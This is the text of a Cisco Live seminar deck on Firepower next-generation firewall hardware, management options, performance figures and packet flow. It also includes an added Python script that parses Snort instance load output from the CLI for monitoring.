Next Generation Firewall Platforms and Integrations

Bart Van Hoecke, Gyorgy Acs, Sven Kutzer, Szilard Csordas, Dragan Novakovic

TECSEC-2600
Cisco Webex Teams

Questions? Use Cisco Webex Teams to chat with the speaker after the session.

How
1 Find this session in the Cisco Events Mobile App
2 Click “Join the Discussion”
3 Install Webex Teams or go directly to the team space
4 Enter messages/questions in the team space
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
Download Scripts and Presentation
http://cs.co/TECSEC-2600
Please install Kahoot
Agenda

• Introduction
• HW/SW Overview
• Day in the life of a packet
• FDM & CDO
• Migration
• Backup & Restore
• REST API Overview
• API Use Cases
• Deployment and Interface Modes
• Application Visibility and Control (AVC)
• NextGen Intrusion Prevention System
• Advanced Malware Protection (AMP)
• Identity & TrustSec
• Security Intelligence
• Usability Improvements
• Transport Layer Security (TLS) Decryption
• Remote Access VPN (RA VPN)
• Threat Hunting Part I
• Threat Hunting Part II
• Closing
Housekeeping

• Please note the handout material has many more slides than presented
• Various slides are marked as Reference and will not be covered in detail
• Breaks for coffee and lunch
  • 10.30am – 10.45am
  • 12.45pm – 2.30pm
  • 4.30pm – 4.45pm
• Technical Seminar ends 6.45pm

• This is an intermediate level technical seminar
• At the end of this session, participants should have:
  • Understanding of the in-depth hardware and software capabilities
  • Knowledge of Cisco's NextGen Security
  • NextGen Security integrations
• We want this class to be informal, with open discussion
• Be collaborative, curious and ask questions

• Visit the World of Solutions
• Meet the Expert
• We value your feedback; don't forget to complete your online session evaluations after each session
• Please switch off your mobile phones
Firepower Diagonal Learning Map (related Cisco Live sessions, Monday to Friday)

• Monday – 8h30: TECSEC-2600 Next Generation Firewall Platforms and Integrations
• TECSEC-3004 Troubleshooting Firepower Threat Defense like a TAC Engineer
• BRKSEC-2494 – 8h30 Maximizing Threat Efficacy & Perf
• BRKSEC-3063 – 14h30 Decrypting the Internet with Firepower!
• BRKSEC-2663 – 16h45 DDoS Mitigation: Introducing Radware Deployment
• BRKSEC-2020 – 11h00 Deploying FP Tips and Tricks
• BRKSEC-2140 – 9h00 2 birds with 1 stone: DUO integration with Cisco ISE and Firewall solutions
• BRKSEC-3455 – 11h15 Dissecting Firepower NGFW: Architecture and Troubleshooting
• BRKSEC-3032 – 11h30 Firepower NGFW Clustering Deep Dive
• BRKSEC-2348 – 17h00 Deploying AC with FP – posture & MFA
• BRKSEC-3300 – 9h00 Advanced IPS Deployment with Firepower NGFW
• BRKSEC-3328 – 11h00 Making Firepower Management Center (FMC) Do More
• BRKSEC-3093 – 14h45 ARM yourself using NGFWv in AZURE
• BRKSEC-2034 – 14h45 Cloud Management of Firepower and ASA with Cisco Defense Orchestrator
• BRKSEC-3629 – 14h45 Designing IPSec VPNs with Firepower Threat Defense integration for Scale and High Availability
• BRKSEC-3035 – 8h30 Firepower Platforms Deep Dive
• BRKSEC-2056 – 9h45 Threat Centric Network Security
Hardware | Software Overview

Security Software Convergence

ASA
• L2-L4 Stateful Firewall, ALG
• Scalable CGNAT, ACL, routing
• High Availability

FirePOWER
• Threat-centric NGIPS
• AVC, URL Filtering for NGFW
• Advanced Malware Protection (AMP)

Firepower Threat Defense (FTD)
• New converged NGFW/NGIPS image
• Data Path with TCP Normalizer, NAT, ACL, dynamic routing, failover functions
• Advanced Inspection Modules with NGIPS, AVC, URL, AMP, Security Intelligence, …
Firepower Threat Defense

Enterprise-class stateful firewall, fed by Cisco Talos intelligence, combining:
• Network Firewall Routing | Switching
• Clustering & High Availability
• Application Visibility & Control (AVC)
• Granular, reputation- and category-based URL filtering
• Industry-leading NGIPS (Advanced Intrusion Prevention)
• Advanced Malware Protection (AMP)
• Built-in Network Profiling
• Identity-Policy Control & VPN
• Firepower Analytics & Automation
Hardware Platforms

By target segment, smallest to largest (NEW marks the platforms introduced most recently):
• IoT: ISA 3000
• SOHO / SMB: FPR 1010 (NEW), ASA 5506/08/16
• Branch Office: FPR 1120/40/50 (NEW), ASA 5525/45/55
• Mid-size Enterprise: FPR 2110/20/30/40
• Large Enterprise: FPR 4110/20/40/50, FPR 4115/25/45 (NEW)
• Data Center / Service Provider: FPR 9300 Series with SM-24/SM-36/SM-44 or SM-40/SM-48/SM-56 (NEW)
• Virtual: FTDv, NGIPSv, ASAv
Firepower Threat Defense Virtual Platforms (FTDv)

Sizing by vCPU count:
• 4 core: 1.2 Gbps AVC, 1.1 Gbps AVC+IPS
• 8 core: 2.4 Gbps AVC, 2.2 Gbps AVC+IPS
• 12 core: 3.6 Gbps AVC, 3.3 Gbps AVC+IPS

Private Cloud: VMware and KVM

Public Cloud
• AWS instance types: c3.xlarge, c4.xlarge, c5.xlarge
• Azure instance types: Standard D3, D3v2
Firepower Management Options

Security integrations and common APIs across all three managers:

Cisco Firepower Management Center (FMC)
• On-premise centralized manager
• Helps administrators enforce consistent access policies, rapidly troubleshoot security events, and view summarized reports across the deployment
• SecOps focused

Cisco Firepower Device Manager (FDM)
• On-box manager for easy on-box management of a single FTD or a pair of FTDs running in HA
• NetOps focused

Cisco Defense Orchestrator (CDO)
• Cloud-based centralized manager for centralized policy management of multiple deployments
• NetOps focused
• For FTD release 6.4 or higher
Which manager is right for your network?

                                         FMC                           CDO                            FDM
Location of manager                      On premise                    Cloud                          On device
Type of manager                          Multi-device                  Multi-device, Multi-platform   Single-device
Primary management focus                 SecOps                        NetOps                         Simplified NGFW
Type of managed device                   NGFW, NGIPS                   NGFW, ASA, MX, AWS VPC         NGFW
Shared policy elements across products                                 Yes
Eventing                                 FMC, Syslog, eStreamer, CTR*  Syslog, Cloud Logging, CTR*    FDM, Syslog, CTR*

* Cisco Threat Response
Software Support by Platform (For Your Reference)

Device Platform                        FMC (FTD)        FDM (FTD)        ASDM/CSM (ASA)
Firepower 1010, 1120, 1140             6.4.0+           6.4.0+           ASA 9.13(1)+
Firepower 1150                         6.5.0+           6.5.0+           ASA 9.13(1)+
Firepower 2110, 2120, 2130, 2140       6.2.1+           6.2.1+           ASA 9.8(2)+
Firepower 4110, 4120, 4140             6.0.1+           6.5.0+           ASA 9.6(1)+
Firepower 4150                         6.1.0+           6.5.0+           ASA 9.6(2)+
Firepower 4115, 4125, 4145             6.4.0+           6.5.0+           ASA 9.12(1)+
Firepower 9300: SM-24, SM-36, SM-44    6.0.1+           6.5.0+           ASA 9.4(1.152)+
Firepower 9300: SM-40, SM-48           6.4.0+           6.5.0+           ASA 9.12(1)+
Firepower 9300: SM-56                  6.4.0+           6.5.0+           ASA 9.12(2)+
ASA 5506-X, 5506H-X, 5506W-X           6.0.1 to 6.2.3   6.1.0 to 6.2.3   ASA 9.3+
ASA 5508-X, 5516-X                     6.0.1+           6.1.0+           ASA 9.4(1)+
ASA 5525-X, 5545-X, 5555-X             6.0.1+           6.1.0+           ASA 8.6+
Virtual: VMware                        6.0.1+           6.2.2+           ASA 9.2(1)+
Virtual: AWS                           6.0.1+           —                ASA 9.4(1.200)+
Virtual: KVM                           6.1.0+           6.2.3+           ASA 9.3(2.200)+
Virtual: Azure                         6.2.0+           6.5.0+           ASA 9.5(2.200)+
ISA 3000                               6.2.3+           6.2.3+           ASA 9.4(1.225)+
EOL Updates and Last Supported Code (For Your Reference)

Last supported releases:

Name                   Replacement                          ASA     ASA w/ FPS    FTD
ASA 5505               FPR1010                              9.2     N/A           N/A
ASA 5506               FPR1010                              TBD     6.2.3         6.2.3
ASA 5512               FPR1120                              9.9.2   9.9.2/6.2.3   6.2.3
ASA 5515               FPR1140                              9.12    9.12/6.4      6.4
ASA 5585-X             FPR4100/9300                         9.12    9.12/6.4      N/A
FPR7K                  FPR1140/50, FPR2K                    N/A     N/A           6.4
FPR8K                  FPR4115-45, FPR9300 (SM40/48/56)     N/A     N/A           6.4
FMC 1500, 3500         FMC 1600, 2600, 4600                 N/A     6.4           6.4
FMC 1000, 2500, 4500   FMC 1600, 2600, 4600                 N/A     N/A           N/A
Firepower Management Center

Firepower Management Center (FMC)

• Defense Center -> FireSIGHT Management -> Firepower Management Center
• Physical and Virtual Appliances
• Physical FMC Models:
  • FMC 1600
  • FMC 2600
  • FMC 4600
• Models are based on the UCS C220 M5 series
FMC Scaling (For Your Reference)

                                FMC 1600     FMC 2600     FMC 4600      FMCv         FMCv300
Managed Devices                 50           300          750           25           300
Max IPS Events                  30 million   60 million   300 million   10 million   60 million
Max Network Map (hosts/users)   50k/50k      150k/150k    600k/600k     50k/50k      150k/150k
Max Flow Rate (fps)             5k fps       12k fps      20k fps       Varies       TBD
Log Storage                     900 GB       1.8 TB       3.2 TB        250 GB       TBD

Average event size: 700 bytes
FMC Performance Considerations

UI response time (FTD -> FMC) is driven by the event rate and event storage:
• Events: Connection, IPS, File, Malware
• Number of sensors
• FTD model type
• Network load
• Logging setup

Deployment time (FMC -> FTD) is driven by the management channel bandwidth and the data download size:
• Configuration, Updates, Image
• Number of sensors
• Model type
• ACL complexity
• HA deployment
FMC Communication Elements

Item                                 Data Transfer Direction   Typical Package Size                                          Default Timeout
Device Configuration and SRU         FTD <- FMC                1-10MB depending on features; up to 1MB added for SRU         5 minutes
URL Database                         FTD <- FMC                20MB for low-end platforms; 40-450MB for high-end platforms   60 minutes
Asynchronous VDB Updates             FTD <- FMC                30-70MB every ~6 weeks                                        10 minutes under 10MB; 60 minutes under 4GB
Software Patch and Upgrade Images    FTD <- FMC                300MB-1GB                                                     60-100 minutes
Events                               FTD -> FMC                Average 700 bytes per event; URL sizes are highly variable    N/A
FMC Link Bandwidth Requirements

• Image file transfer is the bottleneck in terms of minimum bandwidth
  • 700Kbps-2.5Mbps depending on platform and bundle size
  • Consider manual image upload with SCP
• Configuration bundle size varies based on features; the minimum bandwidth is what is needed to deliver the bundle within the default configuration timeout

Policy Type                                                                      Bundle Size   Minimum Bandwidth
1 IPS Policy (Balanced Security and Connectivity)                                1.8MB         52Kbps
2 IPS Policies (No Rules + Balanced Security and Connectivity)                   2.3MB         66Kbps
4 IPS Policies and Minimal AC Policy (All 4 default IPS + 3 AC Rules)            5.3MB         151Kbps
4 IPS Policies and Medium AC Policy (All 4 default IPS + 1000 AC Rules)          7.8MB         221Kbps
4 IPS Policies and Extra Large AC Policy (All 4 default IPS + 5000 AC rules)     8.2MB         234Kbps
4 IPS Policies and Enormous AC Policy (All 4 default IPS + 10000 AC rules)       9MB           255Kbps
FMC Configuration Bundle Size (For Your Reference)

• The number of access policy rules applied on the managed device greatly influences the size of the configuration data to be downloaded
• Expanded number of rules = (source subnets or hosts) * (destination subnets or hosts) * (source ports) * (destination ports) * (custom URLs) * (VLAN tags) * (URL categories) * (valid source and destination zone pairs)
• Recommendations:
  • Use Security Intelligence blacklists to block access to destination subnets instead of access rules
  • Use application filters instead of ports wherever possible in access rules
  • Zones should contain interfaces
Event Management Best Practices (For Your Reference)

• Optimize what data traffic is logged
  • Disable logging for trusted and irrelevant traffic
  • Log only at beginning or end of connection
  • Tune the Variable Set
  • Create Correlation rules to trigger events for specific concerns
• Set an appropriate time window for the event view
  • Longer time windows increase database query times
  • Keep events under 10000
  • Typically an hour
Firepower 9300

Firepower 9300 Overview (3RU)

Supervisor
• Application deployment and orchestration
• Network attachment and traffic distribution
• Clustering base layer for ASA/FTD

Network Modules
• 10GE, 40GE, and 100GE
• Hardware bypass for inline NGIPS

Security Modules
• Embedded Smart NIC and crypto hardware
• Cisco (ASA, FTD) and third-party (Radware DDoS) applications
• Standalone or clustered within and across chassis
Supervisor Module

Front panel: RJ-45 console, 1GE Management (SFP), built-in 10GE data ports (SFP+), and optional network module (NM) slots 1 and 2.

• Overall chassis management and network interaction
• Network interface allocation and module connectivity (960Gbps internal fabric)
• Application image storage, deployment, provisioning, and service chaining
• Clustering infrastructure for supported applications
• Smart Licensing and NTP for entire chassis
Supervisor Simplified Hardware Diagram

• x86 CPU and RAM on the system bus, with an Ethernet connection into the internal switch fabric (up to 24x40GE)
• Internal switch fabric to each of Security Module 1, 2 and 3: 2x40Gbps
• Internal switch fabric to the on-board 8x10GE interfaces: 2x40Gbps
• Internal switch fabric to NM Slot 1 and NM Slot 2: 5x40Gbps each
Standard Network Modules

• All interfaces are called “Ethernet” (i.e. Ethernet 1/1)
• All standard network modules require fiber or copper transceivers

Speed   Number of Ports               Type                    Supported Platforms
1GE     8                             SFP                     Firepower 2100
10GE    8                             SFP+                    Firepower 2100, 4100 and 9300
40GE    4                             QSFP 40G / QSFP 4x10G   Firepower 4100 and 9300
100GE   2 (double) / 2/4 (single)     QSFP 100G               Firepower 9300
Hardware Bypass Fail-to-Wire Network Modules

• Fixed interfaces, no removable SFP support
• Sub-second reaction time to application, software or hardware failure

Speed   Number of Ports   Type           Supported Platforms
1GE     6                 SX             Firepower 2100 and 4100
1GE     8                 GE             Firepower 2100 and 4100
10GE    6                 SR/LR          Firepower 2100, 4100 and 9300
40GE    2                 40G BASE-SR4   Firepower 4100 and 9300
Firepower 9300 Security Modules

• Same modules must be installed across the entire chassis or cluster
• SM-24: 48 x86 CPU cores
• SM-36: 72 x86 CPU cores
• SM-44: 88 x86 CPU cores
• New modules
  • SM-40: 80 x86 CPU cores
  • SM-48: 96 x86 CPU cores
  • SM-56: 112 x86 CPU cores
  • Higher performance on cryptographic operations
Security Module Simplified Diagram

• Two x86 CPUs on the system bus (cores per CPU): SM-24 12+12, SM-36 18+18, SM-40 20+20, SM-44 22+22, SM-48 24+24, SM-56 28+28
• RAM: SM-24 256 GB, SM-36 256 GB, SM-40 384 GB, SM-44 256 GB, SM-48 384 GB, SM-56 384 GB
• CPUs to Smart NIC and Crypto Accelerator: 2x100Gbps Ethernet
• Smart NIC to Supervisor over the backplane: 2x40Gbps
FTD CPU Core Allocation (For Your Reference)

Platform                 Total x86 Cores   Application Cores   System Cores   Data Path   Advanced Inspection Engines
Firepower 4110           24                22                  2              8           12
Firepower 4115           48                46                  2              16          28
Firepower 4120           48                46                  2              20          24
Firepower 4125           64                62                  2              24          36
Firepower 4140           72                70                  2              32          36
Firepower 4145           88                86                  2              32          52
Firepower 4150           88                86                  2              36          48
Firepower 9300 SM-24     48                46                  2              20          24
Firepower 9300 SM-36     72                70                  2              32          36
Firepower 9300 SM-40     80                78                  2              32          44
Firepower 9300 SM-44     88                86                  2              36          48
Firepower 9300 SM-48     96                94                  2              40          52
Firepower 9300 SM-56     112               110                 2              44          64
Monitoring System Utilization (For Your Reference)

• Data Path: show cpu detailed breaks usage down per core into data path (most transit traffic) plus control point (network control and application inspection), shown as "total (data path + control point)":

    ftd# show cpu detailed

    Break down of per-core data path versus control point cpu usage:

    Core      5 sec              1 min              5 min
    Core 0    2.0 (2.0 + 0.0)    1.1 (1.1 + 0.0)    0.9 (0.9 + 0.0)
    Core 1    3.2 (3.2 + 0.0)    1.8 (1.8 + 0.0)    1.5 (1.5 + 0.0)
    […]
    Core 35   0.0 (0.0 + 0.0)    0.0 (0.0 + 0.0)    0.0 (0.0 + 0.0)

• Advanced Inspection Modules: show asp inspect-dp snort shows, per Snort instance, the inspection load (Cpu-Usage), the load distribution (Conns) and the processing state (Status):

    ftd# show asp inspect-dp snort
    Inspection SNORT Inspect Instance Status Info

    Id Pid   Cpu-Usage        Conns      Segs/Pkts  Status
             tot (usr | sys)
    -- ----- ---------------- ---------- ---------- ----------
     0 47430   1% (  1%|  0%)        621          0 READY
     1 47434   0% (  0%|  0%)        610          0 READY
    […]
    45 47474   2% (  2%|  0%)        572          0 READY
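As an added example that is not part of the session material, the script below parses the show asp inspect-dp snort table and flags instances that are hot, not READY, or carrying a disproportionate share of the connections. The sample output it works on is constructed to match the column layout above, not captured from a device, and the CPU and skew thresholds are assumptions to tune per platform.

```python
"""Parse FTD 'show asp inspect-dp snort' output and flag unhealthy Snort instances.

Added example, not part of the TECSEC-2600 material. SAMPLE is a constructed
excerpt in the column layout the FTD CLI prints; the thresholds in
load_report() are assumptions, not Cisco guidance.
"""
import re
from statistics import mean

SAMPLE = """\
Inspection SNORT Inspect Instance Status Info

Id Pid   Cpu-Usage        Conns     Segs/Pkts  Status
         tot (usr | sys)
-- ----- ---------------- --------- ---------- ----------
 0 47430   1% (  1%|  0%)       621          0 READY
 1 47434   0% (  0%|  0%)       610          0 READY
 2 47438  97% ( 91%|  6%)      4120        350 READY
 3 47442   2% (  2%|  0%)       572          0 READY
 4 47446   0% (  0%|  0%)         0          0 DOWN
"""

# One data row: Id, Pid, "tot% ( usr%| sys%)", Conns, Segs/Pkts, Status.
ROW = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<pid>\d+)\s+(?P<tot>\d+)%\s*"
    r"\(\s*(?P<usr>\d+)%\s*\|\s*(?P<sys>\d+)%\s*\)\s+"
    r"(?P<conns>\d+)\s+(?P<segs>\d+)\s+(?P<status>\S+)\s*$"
)


def parse_snort_instances(text):
    """Return one dict per Snort instance; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        row = {k: int(v) for k, v in m.groupdict().items() if k != "status"}
        row["status"] = m.group("status")
        rows.append(row)
    return rows


def load_report(instances, cpu_threshold=80, skew_threshold=3.0):
    """Summarise inspection load and flag instances worth looking at.

    hot        -- instances whose total CPU is at or above cpu_threshold percent
    not_ready  -- instances whose Status is anything but READY
    unbalanced -- the busiest instance holds more than skew_threshold times the
                  average connection count, i.e. the load balancing to Snort is uneven
    """
    conns = [i["conns"] for i in instances]
    avg = mean(conns) if conns else 0.0
    busiest = max(conns) if conns else 0
    return {
        "instances": len(instances),
        "total_conns": sum(conns),
        "avg_conns": avg,
        "max_conns": busiest,
        "hot": [i["id"] for i in instances if i["tot"] >= cpu_threshold],
        "not_ready": [i["id"] for i in instances if i["status"] != "READY"],
        "unbalanced": avg > 0 and busiest / avg > skew_threshold,
    }


if __name__ == "__main__":
    report = load_report(parse_snort_instances(SAMPLE))
    for key, value in report.items():
        print(f"{key:12} {value}")
```

Feed it the real command output (for example collected over SSH on a schedule) and alert on a non-empty hot or not_ready list; a persistent unbalanced result on an otherwise idle box is the signal to look at how flows are being hashed to Snort instances rather than at the Snort rule set.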
Performance Highlights (For Your Reference)

Firepower 9300

Feature                               SM-24     SM-36     SM-40     SM-44     3x SM-44   SM-48     SM-56     3x SM-56
Firewall Throughput (ASA)             75 Gbps   80 Gbps   80 Gbps   80 Gbps   234 Gbps   80 Gbps   80 Gbps   235 Gbps
Throughput: FW + AVC (FTD)*           25 Gbps   34 Gbps   54 Gbps   50 Gbps   148 Gbps   64 Gbps   70 Gbps   168 Gbps
Throughput: FW + AVC + NGIPS (FTD)*   21 Gbps   29 Gbps   48 Gbps   43 Gbps   132 Gbps   55 Gbps   64 Gbps   153 Gbps

* HTTP sessions with an average packet size of 1024 bytes.
Firepower 9300 Software

• Supervisor and security modules use multiple independent images
• All images are digitally signed and validated through Secure Boot
• Security application images are in Cisco Secure Package (CSP) format

Software stack on each security module (Security Module 1, 2 and 3):
• Primary application from Cisco (native): ASA/FTD
• Optional decorator application from a third party (KVM*): DDoS
• FXOS resident provisioning agent

Supervisor: Firepower Extensible Operating System (FXOS). FXOS upgrades are applied to the Supervisor and to the resident provisioning agent on the modules.

* 3rd party packages will run on KVM
Multi-Instance

• Supported on Firepower 4100 and 9300 only
• Instantiate multiple logical devices on a single module or appliance
  • A mix of FTD and ASA instances
  • Leverage Docker infrastructure and container packaging
• Complete traffic processing and management isolation
  • Physical and logical interface and VLAN separation at Supervisor

Example layout on one Firepower 4100 or Firepower 9300 module:
• FTD Instance A: 4 CPU, Ethernet1/1-3
• FTD Instance B: 4 CPU, Ethernet1/4-5
• FTD Instance C: 12 CPU, Port-Channel1.100-101
• FTD Instance D: 4 CPU, Port-Channel2
• ASA Instance A: 12 CPU, Port-Channel1.101-102
FP9300 Application Flexibility

One Firepower 9300 chassis can mix application types per slot:
• Security Module 1 (SM-24): ASA Native
• Security Module 2 (SM-36): FTD Native
• Security Module 3 (SM-56): FTD Instances (Instance 1, Instance 2, Instance 3)
Firewall Clustering (deep dive: BRKSEC-3032)

A clustered firewall sits between Inside and Outside as one logical unit:
• Centralized configuration mirrored to all members
• Connection state preserved after a single member failure
• Stateless load-balancing via Spanned EtherChannel
• Out-of-band Cluster Control Link to compensate for external asymmetry
• Elastic scaling of throughput and maximum concurrent connections
FTD Inter-chassis vs Intra-chassis clustering

FTD Inter-Chassis Cluster (FTD 6.2+)
• Cluster of up to 6 modules (in 2 chassis)
• Off-chassis flow backup for complete redundancy
• Topology: Switch 1 and Switch 2 (Nexus vPC) connect to FP9300 Chassis 1 and FP9300 Chassis 2; the FTD modules in both chassis, each under its own Supervisor, form one FTD Cluster

FTD Intra-Chassis Cluster
• Modules can be clustered within chassis
• Bootstrap configuration is applied by Supervisor
Security Services Architecture

Logical device: an FTD Cluster spanning Security Module 1, 2 and 3. Each unit runs the primary application (FTD) with a DDoS decorator application chained in front of it over the decorator link, so the packet flow passes the decorator before the primary application.

Supervisor:
• Data Outside: PortChannel2
• Data Inside: PortChannel1
• Ethernet1/7 (Management)
• On-board 8x10GE interfaces (Ethernet 1/1-8), 4x40GE NM in Slot 1 (Ethernet 2/1-4), 4x40GE NM in Slot 2 (Ethernet 3/1-4)
• Application image storage
Firepower 4100

Firepower 4100 Overview (1RU)

Built-in Supervisor and Security Module
• Same hardware and software architecture as 9300
• Fixed configurations (4110 - 4150)

Solid State Drives
• Independent operation (no RAID)
• Slot 1 today provides limited AMP storage
• Slot 2 provides optional AMP storage

Onboard Connectivity
• 8 x 10G SFP+

Network Modules
• 10GE/40GE interchangeable with 9300
• Partially overlapping fail-to-wire network modules
Firepower 4100 Architecture

• RAM: 4110 64GB, 4115 192GB, 4120 128GB, 4125 192GB, 4140 256GB, 4145 384GB, 4150 256GB
• x86 CPU 1 / x86 CPU 2 cores: 4110 12 / N/A, 4115 12 / 12, 4120 12 / 12, 4125 16 / 16, 4140 18 / 18, 4145 22 / 22, 4150 22 / 22
• CPUs to Smart NIC and Crypto Accelerator: 4110 1x100Gbps, 4115-4150 2x100Gbps Ethernet
• Smart NIC to internal switch fabric: 4110 1x40Gbps, 4115-4150 2x40Gbps
• Internal switch fabric (up to 18x40GE), controlled by the Supervisor x86 CPU: 2x40Gbps to the on-board 8x10GE interfaces, 5x40Gbps to NM Slot 1 and 5x40Gbps to NM Slot 2
Firepower 4100 Software

• FXOS provides the interface for device management and provisioning of the security application on the security engine
• All images are digitally signed and validated through Secure Boot
• Security application images are in Cisco Secure Package (CSP) format
• DDoS support on Firepower 4100 for ASA/FTD

Software stack on the security engine: primary application from Cisco (native) FTD, optional decorator application from a third party (KVM) DDoS, and FXOS; the Supervisor runs the Firepower Extensible Operating System (FXOS).
Performance Highlights (For Your Reference)

Firepower 4100

Feature                               4110      4115      4120      4125      4140      4145      4150
Firewall Throughput (ASA)             35 Gbps   80 Gbps   60 Gbps   80 Gbps   70 Gbps   80 Gbps   75 Gbps
Throughput: FW + AVC (FTD)*           13 Gbps   27 Gbps   22 Gbps   40 Gbps   32 Gbps   53 Gbps   45 Gbps
Throughput: FW + AVC + NGIPS (FTD)*   11 Gbps   26 Gbps   19 Gbps   35 Gbps   27 Gbps   45 Gbps   39 Gbps

* HTTP sessions with an average packet size of 1024 bytes.
Firepower 2100

Firepower 2100 Overview (1RU)

Integrated Security Platform
• Embedded x86 and NPU with Hardware Crypto Acceleration
• Fixed configurations (2110, 2120, 2130, 2140)
• Dual redundant power supplies on 2130 and 2140 only

SFP/SFP+ Data Interfaces
• 4x1GE on Firepower 2110 and 2120
• 4x10GE on Firepower 2130 and 2140

Copper Data Interfaces
• 12x1GE Ethernet

Network Module
• Firepower 2130 and 2140 only
• Standard or Hardware Fail-to-Wire Network Modules
Firepower 2100 Architecture

x86 CPU, running the Advanced Inspection Modules (AVC with OpenAppID, NGIPS, Malware & File inspection (AMP), Security Intelligence, URL Filter, User Identity)
• Cores: 2110 4, 2120 6, 2130 8, 2140 16
• RAM: 2110-2120 16GB, 2130 32GB, 2140 64GB

Network Processor Unit (NPU), running the Data Path (NAT, VPN, Routing, Stateful Firewall, High Availability, Prefilter Action: Block, Fastpath, Analyze)
• Cores: 2110 6, 2120 8, 2130 12, 2140 16
• RAM: 2110-2120 8GB, 2130-2140 16GB

Interconnects
• x86 CPU to NPU: 2x10Gbps Ethernet
• NPU to internal switch fabric: 2110-2120 2x10Gbps, 2130-2140 1x40Gbps
• Internal switch fabric to on-board 12x1GE copper interfaces: 12x1Gbps
• Internal switch fabric to on-board 4xSFP interfaces: 2110-2120 4x1Gbps, 2130-2140 4x10Gbps
• Internal switch fabric to interface expansion module (2130-2140 only): 8x10Gbps
• Dedicated management interface
Performance Highlights (For Your Reference)

Cisco Firepower 2100

Feature                               2110       2120     2130        2140
Firewall Throughput (ASA)             3 Gbps     6 Gbps   10 Gbps     20 Gbps
Throughput: FW + AVC (FTD)*           2.0 Gbps   3 Gbps   4.75 Gbps   8.5 Gbps
Throughput: FW + AVC + NGIPS (FTD)*   2.0 Gbps   3 Gbps   4.75 Gbps   8.5 Gbps

* HTTP sessions with an average packet size of 1024 bytes.
Firepower 1000

Firepower 1100 Overview (1RU)

Integrated Security Appliance
• Embedded x86 CPU with QuickAssist Crypto Acceleration
• Fixed non-modular configurations (1120, 1140, 1150)
• Single Power Supply

SFP Data Interfaces
• 4x1GE on 1120 and 1140
• 2x1GE, 2x10GE on 1150

Copper Data Interfaces
• 8x1GE Ethernet

Field Replaceable SSD
Firepower 1010 Overview (Desktop)

Integrated Security Appliance with ASA or FTD
• Embedded x86 CPU with QuickAssist Crypto Acceleration
• Fixed non-modular configuration

Copper Data Interfaces
• 8x1GE Ethernet
• Built-in Layer 2 switch
• Power over Ethernet (PoE) on ports 7 and 8
Firepower 1000 Architecture

• x86 CPU cores: 1010 8, 1120 24, 1140 32, 1150 32
• RAM: 1010 8GB, 1120-1140 16GB, 1150 32GB
• CPU to internal switch fabric: 1010 2x2.5Gbps, 1120-1150 2x10Gbps Ethernet
• Internal switch fabric to on-board 8x1GE copper interfaces: 8x1Gbps (on the 1010 via the embedded Layer 2 switch)
• Internal switch fabric to on-board 4xSFP interfaces (1120-1150 only): 4x1Gbps
• Dedicated management interface
Firepower 1000/2100 ASA Appliance Mode

• Platform mode
  • Configuration of basic operating parameters and hardware interface settings in FXOS
  • Configuration of your security policy in the ASA operating system using ASDM or the ASA CLI
• Appliance mode (the default)
  • Configuration of all settings in the ASA
  • Only advanced troubleshooting commands in FXOS CLI

Management options:
• Dedicated enterprise management interface (DHCP client with CLI/HTTPS access)
• In-band management via Inside (DHCP server with CLI/HTTPS and outbound access)
Industrial Security Appliance (ISA) 3000

ISA 3000

• ISA-3000 supports 3 different software architectures
  • ASA
  • ASA w/ FirePOWER Services 6.3+
  • FTD 6.2.3+
• Now supports AMP and URL (6.4)

Two models of ISA 3000
• Copper interfaces: 4C
• Fiber interfaces: 2C2F
A Day In the Life Of a Packet

Packet Processing - Overview
• A packet enters the ingress interface and is handled by the chassis internal switch.
• The packet enters the FTD Lina engine, which mainly performs L3/L4 checks.
• If the policy requires it, the packet is inspected by the Snort engine (mainly L7 inspection).
• The Snort engine returns a verdict (for example, whitelist or blacklist) for the packet.
• The Lina engine drops or forwards the packet based on Snort's verdict.
• The packet egresses the chassis through the internal chassis switch.

Components: Internal Switch (FXOS) -> Data Path (Lina engine) -> Advanced Inspection Engine (Snort) -> Data Path -> Internal Switch.
FTD CLI Configuration Modes (For Your Reference)

CLISH mode (the default FTD shell):
    > expert

Expert mode (Linux shell):
    admin@FTD5506-1:~$ sudo su
    Password:
    root@FTD:/home/admin# sudo sfconsole
    Attaching to ASA console ... Press 'Ctrl+a then d' to detach.
    Type help or '?' for a list of available commands.

FTD (Lina) CLI:
    firepower#
NGFW Packet Flow

Datapath (diagram, build 1): RX -> L2 Decode -> IP Decode, Reassembly -> L4 Decode -> TCP Intercept -> Inspection Engines
NGFW Packet Flow – Defragmentation (For Your Reference)

• In case a packet is fragmented, the datapath fragment policy drops or reassembles the fragments
• Datapath fragment settings are globally configured
• Global fragment settings can be overridden by interface-specific settings
NGFW Packet Flow

Datapath (diagram, build 2): RX -> L2 Decode -> IP Decode, Reassembly -> L4 Decode -> TCP Intercept -> VPN Decrypt -> Inspection Engines
NGFW Packet Flow (cluster flow redirect is covered in BRKSEC-3032)

Datapath (diagram, builds 3-5): RX -> L2 Decode -> IP Decode, Reassembly -> L4 Decode -> TCP Intercept -> VPN Decrypt -> Route and Flow Lookup (Flow Database; Cluster Flow Redirect)
• Existing flow: Update Flow
• New flow: NAT Lookup -> Advanced IP ACL Match
-> Inspection Engines
NGFW Packet Flow – Prefilter Policies

• Provides Early Access Control (EAC) on L3/4 criteria only, evaluated ahead of the rest of your NGFW ruleset
  • Block – Drops traffic at a very early stage
  • Fastpath – Bypasses the advanced inspection engines
    • Used for static flow-offloading
    • Dynamic flow-offload is supported from 6.3
  • Analyze – Sends traffic to the advanced inspection engines
NGFW Packet Flow – Prefilter Policies

• In contrast to Prefilter Fastpath rules, packets matching an ACP Trust rule are still subject to some deep inspection engines, e.g. Security Intelligence:

Phase: 16
Type: SNORT
Reputation: packet blacklisted, drop
Snort id 0, NAP id 2, IPS id 0, Verdict BLACKLIST, Blocked by SI/Reputation
Snort Verdict: (black-list) black list this flow
NGFW Packet Flow – Prefilter Policies (Tunnel) (For Your Reference)

• Adds additional flexibility when it comes to handling tunneled traffic
• GRE, IP-in-IP, IPv6-in-IP, Teredo (port 3544)
NGFW Packet Flow (diagram, continued over several slides)

